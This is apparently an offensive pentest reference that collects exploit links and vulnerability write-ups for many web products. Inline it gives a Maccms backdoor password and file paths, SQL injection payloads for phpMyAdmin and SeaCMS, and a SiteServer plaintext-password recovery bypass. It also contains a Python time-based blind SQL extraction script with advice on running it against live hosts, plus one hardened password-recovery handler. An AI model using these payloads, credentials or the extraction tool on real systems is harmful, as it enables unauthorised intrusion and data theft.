[Discuz!x3.4后台文件任意删除漏洞分析](https://xz.aliyun.com/t/4725) [DiscuzX v3.4 排行页面存储型XSS漏洞 分析](https://xz.aliyun.com/t/2899) 
[WooYun-2015-137991 Discuz利用UC_KEY进行前台getshell2](https://php.mengsec.com/bugs/wooyun-2015-0137991.html) [Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)](https://paper.seebug.org/763/) [FoolMitAh/CVE-2018-14729](https://github.com/FoolMitAh/CVE-2018-14729) [实例分析 DiscuzX 3.4 SSRF漏洞](https://mp.weixin.qq.com/s/TRCdXZU8v1NsbFhZKLa1Qw) [Discuz x3.4前台SSRF](https://www.codercto.com/a/43029.html) [theLSA/discuz-ml-rce](https://github.com/theLSA/discuz-ml-rce) [Discuz! ML远程代码执行(CVE-2019-13956)](https://www.cnblogs.com/yuzly/p/11386755.html) [Discuz!ML V3.X 代码注入分析](https://xz.aliyun.com/t/5638) ## Drupal [CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造](https://paper.seebug.org/334/) [Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 (CVE-2017-6920)](https://vulhub.org/#/environments/drupal/CVE-2017-6920/) https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md [pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600) [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2) [Drupal 远程代码执行漏洞(CVE-2018-7602)](https://vulhub.org/#/environments/drupal/CVE-2018-7602/) [CVE-2018-7600/drupa7-CVE-2018-7602.py](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py) [Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) https://vulhub.org/#/environments/drupal/CVE-2019-6339/ [Drupal(CVE-2020-28948/CVE-2020-28949)分析](https://mp.weixin.qq.com/s/-5z2gCrstyCLOOzgf1tZTg) ## ECshop [ECShop 2.x/3.x SQL注入/任意代码执行漏洞](https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md) [ecshop2.x 代码执行](https://paper.seebug.org/691/) [ecshop后台getshell](http://www.zstreamer.cn/2020/09/09/ecshop2.7_3.6后台getshell/) ## ElasticSearch - `http://[ip]:9200` - `http://[ip]:9200/_plugin/head/` web 管理界面 - `http://[ip]:9200/hello/_search?pretty&size=50&from=50` - `http://[ip]:9200/_cat/indices` - `http://[ip]:9200/_river/_search` 查看数据库敏感信息 - `http://[ip]:9200/_nodes` 查看节点数据 - `http://[ip]:9200/_cat/indices?v` 查看当前节点的所有 Index - 
`http://[ip]:9200/_search?pretty=true` 查询所有的 index, type - [Elasticvue](https://chrome.google.com/webstore/detail/elasticvue/hkedbapjpblbodpgbajblpnlpenaebaa?hl=en-US) - 进行未授权访问漏洞利用的插件 [ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/) [Remote Code Execution in Elasticsearch - CVE-2015-1427](https://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/) [ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/) https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/ [Elasticsearch目录遍历漏洞 (CVE-2015-5531) 复现与分析 (附PoC)](https://www.freebuf.com/vuls/99942.html) https://blog.csdn.net/u013613428/article/details/121884479 ## Exchange [xchange邮件服务器的账户爆破](https://github.com/grayddq/EBurst) [利用NTLM Hash读取Exchange邮件](https://github.com/Ridter/GetMail) [Exchange渗透测试总结](https://www.anquanke.com/post/id/184342) ## ewebeditor [ewebeditor 编辑器漏洞总结](https://www.0dayhack.com/post-426.html) ## Fastadmin [fastadmin最新版前台getshell漏洞](https://mp.weixin.qq.com/s/XR6p6sf3__QtpMjJuJEjfA) [fastadmin文件管理插件](https://github.com/WenchaoLin/Filex) ## FastJson [基于dbcp的fastjson rce 回显](https://github.com/depycode/fastjson-local-echo) [Fastjson-Gadgets-自动扫描仪](https://github.com/H3rmesk1t/Fastjson-Gadgets-Automatic-Scanner) [Fastjson姿势技巧集合](https://github.com/safe6Sec/Fastjson) [fastjson bypass autotype 1.2.68 with Throwable and AutoCloseable.](https://github.com/Y4er/fastjson-bypass-autotype-1.2.68) ## Fckeditor [fck2.4.3文件上传通杀脚本](https://github.com/chaosec2021/FCKeditor-2.4.3--exp) [Fckeditor上传漏洞利用拿shell总结](https://www.0dayhack.com/post-413.html) ## Flask [Flask 内存马](https://github.com/iceyhexman/flask_memory_shell) ## GeoServer [CVE-2023-25157 - GeoServer SQL 注入 - PoC](https://github.com/win3zz/CVE-2023-25157/) ## Gitlab [gitlab-version-nse](https://github.com/righel/gitlab-version-nse) [通过the bulk imports 
UploadsPipeline任意文件读取](https://gitlab.com/gitlab-org/gitlab/-/issues/349524) [CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205) [CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205) [GitLab任意文件读取漏洞复现](https://mp.weixin.qq.com/s/HKZHUs_bTN-00_8HsU6grA) [Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052) [CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992) ## Gitea [Gitea 存储库迁移远程命令执行漏洞。](https://github.com/wuhan005/CVE-2022-30781) [Go代码审计 - gitea 远程命令执行漏洞链](https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html) https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce ## Harbor https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ https://www.youtube.com/watch?v=v8Isqy4yR3Q ## Hikvision [Hikvision 流媒体管理服务器敏感信息泄漏](https://github.com/Henry4E36/HikvisionInformation) [海康威视 CVE-2021-36260 RCE 漏洞](https://github.com/Cuerz/CVE-2021-36260) [海康威视综合安防平台后渗透利用工具](https://github.com/wafinfo/Hikvision) [HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20iVMS-8700%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20upload.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html) [HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) [HiKVISION 综合安防管理平台 files 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20files%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [HiKVISION 综合安防管理平台 report 
任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20report%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [HiKVISION 综合安防管理平台 env 信息泄漏漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html) ## IIS [多线程批量检测IIS短文件名漏洞+漏洞利用](https://github.com/VMsec/iisScaner) [CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit](https://paper.seebug.org/259/) [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC) [edwardz246003/IIS_exploit](https://github.com/edwardz246003/IIS_exploit) ## IP-Guard [【漏洞复现】IP-guard WebServer 远程命令执行漏洞](https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247486971&idx=1&sn=11a6cbd4db9a45976beb39fe613a3010) ## Jboss [JBOSS和其他 Java 反序列化漏洞验证和利用工具](https://github.com/joaomatosf/jexboss) [jboss常见漏洞复现](https://www.xpshuai.cn/posts/60637/) [Jboss漏洞总结](http://www.zstreamer.cn/2020/07/09/Jboss漏洞总结/) [Red Hat JBoss EAP - Deserialization of Untrusted Data](https://www.exploit-db.com/exploits/40842) [JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)](https://github.com/vulhub/vulhub/blob/master/jboss/CVE-2017-7504/README.md) [yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149) [jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149) https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 [JBoss JMXInvokerServlet 反序列化漏洞](https://github.com/vulhub/vulhub/blob/master/jboss/JMXInvokerServlet-deserialization/README.md) ## JeecgBoot [jmreport/qurestSql 未授权SQL注入批量扫描poc](https://github.com/MzzdToT/CVE-2023-1454) ## Jetty https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28169/README.zh-cn.md https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md ## Jenkins 
[awesome-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019) [Hacking Jenkins Part 1 - Play with Dynamic Routing](https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/) [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/) [Jenkins RCE漏洞分析汇总](http://www.lmxspace.com/2019/09/15/Jenkins-RCE漏洞分析汇总/) [安全研究 | Jenkins漏洞分析](https://www.freebuf.com/news/242764.html) [Jenkins漏洞探测、用户抓取爆破](https://github.com/blackye/Jenkins) [Jenkins任意文件读取漏洞(CVE-2018-1999002)复现记录](https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w) [Jenkins未授权访问RCE漏洞复现记录 | angelwhu_blog](https://www.angelwhu.com/blog/?p=539) [jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392) ## Joomla [CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0](https://github.com/stefanlucas/Exploit-Joomla) [Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析](https://paper.seebug.org/305/) [HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132) ## JumpServer [JumpServer远程执行漏洞 复现](https://www.o2oxy.cn/2921.html) [JumpServer远程命令执行你可能不知道的点(附利用工具)](https://mp.weixin.qq.com/s/lbcYzNsiOYZRwQzAIYxg3g) [Skactor/jumpserver_rce](https://github.com/Skactor/jumpserver_rce) [Veraxy00/Jumpserver-EXP](https://github.com/Veraxy00/Jumpserver-EXP) [Jumpserver安全一窥:Sep系列漏洞深度解析](https://mp.weixin.qq.com/s/3iAn_aUNg8k5qW34Yb21Bw) [JumpServer 密码重置漏洞](https://github.com/C1ph3rX13/CVE-2023-42820) [JumpServer 任意文件写入漏洞 CVE-2023-42819 + CVE-2023-42820 = GetShell](https://github.com/C1ph3rX13/CVE-2023-42819) ## Kindeditor [kindeditor<=4.1.5上传漏洞复现](https://www.cnblogs.com/backlion/p/10421405.html) [大批量Kindeditor文件上传事件的漏洞分析](https://www.freebuf.com/column/202148.html) ## Laravel [Laravel 6.x/7.x的一条执行代码的反序列化利用链](https://www.o2oxy.cn/3588.html) [LARAVEL <= V8.4.2 DEBUG MODE: REMOTE CODE EXECUTION](https://www.ambionics.io/blog/laravel-debug-rce) 
[Vulnerability analysis | Laravel debug page RCE (CVE-2021-3129) analysis and reproduction](https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g)
[Revisiting Laravel debug mode RCE (CVE-2021-3129)](https://www.freebuf.com/vuls/264662.html)
[ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
[Laravel 8.x image upload bypass](https://infosecwriteups.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b)

## Log4j

[log4j solr rce](https://twitter.com/pyn3rd/status/1470359076617932800)
[Software affected by Log4j](https://github.com/NCSC-NL/log4shell/tree/main/software)
[CVE-2021-44228 - Log4j Java exploitation - WAF bypass tricks](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)
[Log4j is still being exploited today (the long tail of Log4Shell exploitation)](https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/)
[Log4j-Payloads](https://github.com/queencitycyber/Log4j-Payloads)

## Maccms

Backdoored files in Maccms v10 and their password:

```
maccms10\extend\upyun\src\Upyun\Api\Format.php
maccms10\extend\Qcloud\Sms\Sms.php
password: WorldFilledWithLove
```

[Maccms v10 backdoor](http://www.360doc.com/content/20/0203/14/30583588_889434397.shtml)

## Milesight

[Milesight VPN server.js arbitrary file read](https://peiqi.wgpsec.org/wiki/iot/Milesight/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

## MinIO

[Containers meet the cloud: a test against MinIO](https://cloud.tencent.com/developer/article/1785462)
[(CVE-2023-28432) MinIO verify endpoint sensitive information disclosure](https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486024&idx=1&sn=505829c79bc3bdc2b6598cdaf104666b&chksm=c1f925faf68eacec10fbc833c87f8f95578ebe0cd86b9d54690d471fd1d10eb44bf145d6be6a)
[GHSA-4999-659w-mq36 (minio/console advisory)](https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36)

## MessageSolution

[CNVD-2021-10543: MessageSolution Enterprise Email Archiving (EEA) information disclosure](https://github.com/Henry4E36/CNVD-2021-10543)

## MetInfo

[MetInfo 5.3.19 insufficient filtering during installation leads to getshell](https://bbs.ichunqiu.com/thread-35305-1-17.html)
[MetInfo 6.0.0 vulnerability collection (part 1)](https://bbs.ichunqiu.com/thread-43416-1-7.html)
[MetInfo 6.1.0 vulnerabilities (part 2)](https://bbs.ichunqiu.com/thread-43625-1-4.html)
[MetInfo 6.1.2 SQL injection](https://bbs.ichunqiu.com/thread-46687-1-1.html)
[MetInfo latest version backend getshell](https://bbs.ichunqiu.com/thread-29686-1-2.html)
[Some low-value MetInfo 7 vulnerabilities](https://evi1.cn/post/metinfo7-bug/)
[Metinfo7.0 SQL Blind Injection](https://github.com/T3qui1a/metinfo_sqlinjection/issues/1)
[CVE-2018-13024 reproduction and a simple internal network penetration](https://www.freebuf.com/news/193748.html)

## Metabase

[Metabase validate remote command execution CVE-2023-38646](https://peiqi.wgpsec.org/wiki/webapp/Metabase/Metabase%20validate%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2023-38646.html)

## MeterSphere

[Arbitrary file upload](https://github.com/metersphere/metersphere/issues/8653)

## Nacos

Note: in most enterprise deployments the Nacos user endpoint is served at /v1/auth/users rather than /nacos/v1/auth/users, so probe both paths when testing.

[Alibaba Nacos unauthenticated access vulnerability](https://blog.csdn.net/m0_46257936/article/details/113127814)
[nuclei template for CVE-2021-29441](https://raw.githubusercontent.com/dwisiswant0/nuclei-templates/add/GHSL-2020-325/cves/2021/CVE-2021-29441.yaml)
[Nacos client YAML deserialization analysis](https://xz.aliyun.com/t/10355)
[Nacos password spraying](https://www.jisuan.mobi/nX7.html)
[Nacos Hessian deserialization exploit tool](https://github.com/c0olw/NacosRce)

## NETGEAR ProSafe SSL VPN

[NETGEAR ProSafe SSL VPN SQL injection](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383)

## Nexus

[Nexus Repository Manager 3 remote command execution (CVE-2019-7238)](https://vulhub.org/#/environments/nexus/CVE-2019-7238/)
[mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238)
[jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238)
[Nexus Repository Manager (CVE-2020-10199/10204) analysis and a brief discussion of output-echo exploitation](https://www.cnblogs.com/magic-zero/p/12641068.html)
[aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199)
[CVE-2020-29436: Nexus 3 XML external entity injection reproduction](https://mp.weixin.qq.com/s/u6LWHvNEieQsV-ny6xwMmQ)

## NPS

[carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass)

## Openfire

[Backend plugin getshell](https://github.com/22CB7139/openfire_shells)
[Openfire AES and Blowfish encryption/decryption tool](https://github.com/ca3tie1/OpenFireEncryptor)

## Oracle Access Manager

[CVE-2021-35587 Oracle Access Manager unauthenticated attacker vulnerability](https://github.com/antx-code/CVE-2021-35587/blob/main/CVE-2021-35587.py)

## Outlook

[A small tool for playing with Outlook](https://github.com/eksperience/KnockOutlook)

## Panalog log audit system

[Panalog log audit system arbitrary user creation and backend command execution](https://mp.weixin.qq.com/s/98kn5ry-C-IeKY2MDebjLw)

## PHPMailer

[PHPMailer arbitrary file read](https://mp.weixin.qq.com/s/y7N3CD1683W2WX-naT5HCA)

## phpMyAdmin

[A new way to getshell through phpMyAdmin](https://zhuanlan.zhihu.com/p/25957366)
[phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution](https://www.exploit-db.com/exploits/40185)
[phpMyAdmin 4.7.x CSRF exploitation](https://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/)
[phpMyAdmin 4.8.1 backend getshell](https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog)
[CVE-2018-12613 study notes](https://mp.weixin.qq.com/s/zGJxjtDLkw9CMHGfNRu1nw)
[phpMyAdmin arbitrary file read (CVE-2019-6799) reproduction and writing a detection PoC](https://bbs.zkaq.cn/t/4570.html)
[CVE-2019-12922 4.9.0.1 CSRF](https://www.hedysx.com/bug/2398.html)

CVE-2020-26935, phpMyAdmin authenticated SQL injection (error-based, through the where_clause parameter; the updatexml() error message carries the result):

```
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
```

[phpMyAdmin 5.1.1 - XSS](https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A)

## PHPMyWind

[Notes from a penetration test](https://xz.aliyun.com/t/6018)
[PHPMyWind latest version SQL injection, backend directory traversal and file read](https://blog.csdn.net/dengzhasong7076/article/details/102139691)
[PHPMyWind v5.5 audit notes](https://bbs.ichunqiu.com/thread-46703-1-1.html)
[Exploit-DB 42535](https://www.exploit-db.com/exploits/42535)

## PigCMS

[PigCMS action_flashUpload arbitrary file upload](https://peiqi.wgpsec.org/wiki/cms/PigCMS/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## Resin

[Attack vectors against the Resin service](https://blkstone.github.io/2017/10/30/resin-attack-vectors/)
[Resin arbitrary file read](https://www.cnblogs.com/KevinGeorge/p/8953731.html)
[In-depth analysis of the Resin container file parsing vulnerability](https://mp.weixin.qq.com/s/eZAG3Ze0ytd5l7ci1nb-qg)

## SeaCMS

Fingerprint: `app="海洋CMS"`

An attacker can inject SQL through the id parameter of the edit action in admin_members_group.php. The payload below is a time-based blind probe: when mid(user(),1,1) is 'r', the if() branch makes MySQL match a very long concat(rpad(...)) string against a backtracking regex with RLIKE and the response is noticeably delayed; otherwise it returns at once.

```
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
```

## Shiro

[Shiro cookie serialized-data decryption helper based on SerializationDumper](https://github.com/r00tuser111/SerializationDumper-Shiro)
[Modified BeichenDream/InjectJDBC with Shiro key extraction and key replacement](https://github.com/SummerSec/AgentInjectTool)
[shiro-550-with-NoCC](https://github.com/dr0op/shiro-550-with-NoCC)
[j1anFen/shiro_attack](https://github.com/j1anFen/shiro_attack)
[ShiroExploit-Deprecated](https://github.com/feihong-cs/ShiroExploit-Deprecated)
[Echox1/ShiroExploit](https://github.com/Echox1/ShiroExploit)
[Ares-X/shiro-exploit](https://github.com/Ares-X/shiro-exploit)
[Shiro deserialization command execution detection helper](https://github.com/wyzxxz/shiro_rce_tool)
[Burp plugin ShiroScan, mainly for framework and DNSlog-free key detection](https://github.com/Daybr4ak/ShiroScan)

## ShopXO

[ShopXO download arbitrary file read CNVD-2021-15822](https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog)

## ShowDoc

[ShowDoc unauthenticated arbitrary file upload](http://47.115.146.38/2021/04/27/showdoc/)

## SiteServer

**Password recovery**

The administrator's "password recovery question answer" is an optional field and is usually left blank. Submitting an empty answer on the password recovery page then returns the current administrator's password in plaintext (the page only limits the answer length with JavaScript, so disabling JavaScript bypasses it).

Visit /siteserver/forgetPassword.aspx, disable JavaScript, enter the username and obtain the password.

[Code audit | SiteServer CMS authentication mechanism](https://www.freebuf.com/vuls/228448.html)
[Code audit | SiteServer CMS secret key attack](https://www.freebuf.com/vuls/234549.html)
[A certain Server CMS 6.8.3 captcha bypass and multiple backend injections](https://xz.aliyun.com/t/4119)
[Notes on a SiteServer remote template download getshell caught in the wild during incident response](https://www.freebuf.com/articles/web/195105.html)
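The SeaCMS payload above only tests one character of user(); the loop below generalises it into a full extraction using response time as the oracle. This is an added example, not code from the FrameVul page or from SeaCMS: the host name, the charset and the 3-second threshold are assumptions, and make_simulated_fetch() is a constructed stand-in for the target so the loop runs offline.

```python
"""Time-based blind extraction built from the SeaCMS id-parameter payload above."""
import re
import time
from typing import Callable
from urllib.parse import parse_qs, quote, urlparse
from urllib.request import urlopen

BASE_URL = "http://seacms.example"   # assumption: the host under test
PATH = "/admin_members_group.php"    # endpoint and parameter listed on the page

# 16 x rpad(1,999999,'a') concatenated, exactly as in the page's payload.
HEAVY_STRING = "concat(" + ",".join(["rpad(1,999999,'a')"] * 16) + ")"
# The backtracking pattern from the page's payload: 7 x (a.*)+ followed by 'cd'.
BACKTRACK_REGEX = "(a.*)+" * 7 + "cd"

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789@._-"   # assumption: enough for user()


def build_payload(pos: int, ch: str, expr: str = "user()") -> str:
    """Raw (not yet URL-encoded) value of the id parameter for one guess."""
    return (f"2 and if(mid({expr},{pos},1)='{ch}',"
            f"{HEAVY_STRING} RLIKE '{BACKTRACK_REGEX}',1)")


def build_url(pos: int, ch: str, expr: str = "user()") -> str:
    return f"{BASE_URL}{PATH}?action=edit&id={quote(build_payload(pos, ch, expr), safe='')}"


def timed_fetch(url: str, timeout: float = 30.0) -> float:
    """Live probe: seconds until a response arrives (not used by the offline run).
    A timeout after a long wait still counts as slow, which is what we want."""
    start = time.monotonic()
    try:
        urlopen(url, timeout=timeout).read()
    except Exception:
        pass
    return time.monotonic() - start


def extract(fetch: Callable[[str], float], expr: str = "user()",
            max_len: int = 32, threshold: float = 3.0) -> str:
    """Recover expr one character at a time: a response slower than threshold
    seconds means the guessed character at that position was correct."""
    result = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in CHARSET:
            if fetch(build_url(pos, ch, expr)) >= threshold:
                hit = ch
                break
        if hit is None:          # nothing matched: end of the string
            break
        result += hit
    return result


def make_simulated_fetch(secret: str, slow: float = 5.0, fast: float = 0.1):
    """Constructed offline stand-in for the target: decodes the id parameter and
    reports a slow response only when the guessed character is right."""
    pattern = re.compile(r"mid\([^,]+,(\d+),1\)='(.)'")

    def fetch(url: str) -> float:
        value = parse_qs(urlparse(url).query)["id"][0]
        m = pattern.search(value)
        pos, ch = int(m.group(1)), m.group(2)
        return slow if pos <= len(secret) and secret[pos - 1] == ch else fast

    return fetch


if __name__ == "__main__":
    print(extract(make_simulated_fetch("root@localhost")))
```

Against a live host, pass `timed_fetch` instead of the simulated function and calibrate `threshold` against a few baseline requests first; network jitter, not the regex, is the usual source of false positives.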
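The SiteServer password-recovery flaw above is a server that trusts a client-side check. The model below reproduces that logic beside the server-side version a reviewer would ask for. It is an added example, not code from the FrameVul page or from SiteServer CMS; the user records are constructed sample data and the field names are assumptions.

```python
"""Vulnerable and hardened password-recovery handlers (model of the SiteServer flaw)."""
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class Admin:
    username: str
    password: str          # stored in the clear, which is why the flow can leak it
    question_answer: str   # optional recovery answer; "" when the admin never set one


# Constructed sample accounts: "admin" left the recovery answer blank, "ops" set one.
USERS = {
    "admin": Admin("admin", "Adm1n-sample-pass", ""),
    "ops": Admin("ops", "0ps-sample-pass", "blue"),
}


def forgot_password_vulnerable(username: str, answer: str) -> Optional[str]:
    """Mirrors the behaviour described above: the only length check lives in the
    browser, so an empty answer reaches the server, "" == "" succeeds for any admin
    who never set an answer, and the response hands back the plaintext password."""
    user = USERS.get(username)
    if user is None:
        return None
    if answer == user.question_answer:
        return user.password
    return None


def forgot_password_hardened(username: str, answer: str) -> Optional[str]:
    """Server-side rules:
    - refuse when no recovery answer was ever configured,
    - refuse an empty submitted answer regardless of what the client did,
    - compare in constant time,
    - never return the password; issue a one-time reset token instead.
    Unknown users get the same None so the endpoint does not reveal which
    usernames exist."""
    user = USERS.get(username)
    if user is None or not user.question_answer or not answer:
        return None
    if not hmac.compare_digest(answer.encode("utf-8"),
                               user.question_answer.encode("utf-8")):
        return None
    return secrets.token_urlsafe(32)
```

The token would be stored server-side with an expiry and delivered out of band; storing the recovery answer hashed rather than in the clear is the next step, omitted here to keep the comparison with the vulnerable handler direct.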
[zhaoweiho/SiteServer-CMS-Remote-download-Getshell](https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell)

## Sophos Firewall

[CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040)

## Spring

[CVE-2022-22947 Spring Cloud Gateway remote code execution reproduction](https://mp.weixin.qq.com/s/5ZBpVTofGpG_ssz2iPeI2A)
[Spring-cloud-function SpEL RCE, Vultarget & Poc](https://github.com/cckuailong/spring-cloud-function-SpEL-RCE)
[SpringBootVulExploit: Spring Boot vulnerability study material, exploitation methods and tricks, black-box assessment checklist](https://github.com/LandGrey/SpringBootVulExploit)
[Quick exploitation tool for Spring Boot env endpoints](https://github.com/0x727/SpringBootExploit)
[Spring exploits](https://github.com/Crush-sudo/pocsuite/tree/master/Spring)
[Spring Boot fat JAR: from arbitrary file write to stable RCE](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks)
[Spring scanner](https://github.com/0xsp-SRD/OffensivePascal/tree/main/SpringCore-Scanner)
[Heap dump sensitive information extraction tool](https://github.com/whwlsfb/JDumpSpider)
[Common Java web vulnerabilities and secure code based on Spring Boot and Spring Security](https://github.com/JoyChou93/java-sec-code)

## Struts2

[Struts2 all-vulnerability scan and exploit tool](https://github.com/HatBoy/Struts2-Scan)
[Struts vulnerability demo source](https://github.com/xhycccc/Struts2-Vuln-Demo)
[S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE](https://github.com/Wrin9/CVE-2021-31805)
[S2-062 CVE-2021-31805 remote code execution verification PoC](https://github.com/YanMu2020/s2-062)
[Python 2 Struts2 all-version detection and exploitation tool](https://github.com/Lucifer1993/struts-scan)
[Struts2 vulnerability check tool](https://github.com/shack2/Struts2VulsTools)
[Go version Struts2 scan and exploit tool](https://github.com/x51/STS2G)
[Struts2 WAF bypass for file read/write and alternative ways to execute commands](https://f0ng.github.io/2022/04/14/struts2绕过waf读写文件及另类方式执行命令/)
[Struts2 scanner Burp plugin](https://github.com/novysodope/ST2Scanner)
[Burp passive scanner plugin for Struts2 RCE, only checks requests whose URL ends in .do or .action](https://github.com/x1a0t/Struts2Burp)

## ThinkAdmin

[ThinkAdmin V6 unauthorized access and arbitrary file read reproduction](https://blog.csdn.net/Adminxe/article/details/108744912)

## ThinkCMF

[ThinkCMF arbitrary content include getshell](https://www.hacking8.com/bug-web/ThinkCMF/ThinkCMF-框架上的任意内容包含漏洞.html)
[jas502n/ThinkCMF_getshell](https://github.com/jas502n/ThinkCMF_getshell)

## Thinkphp

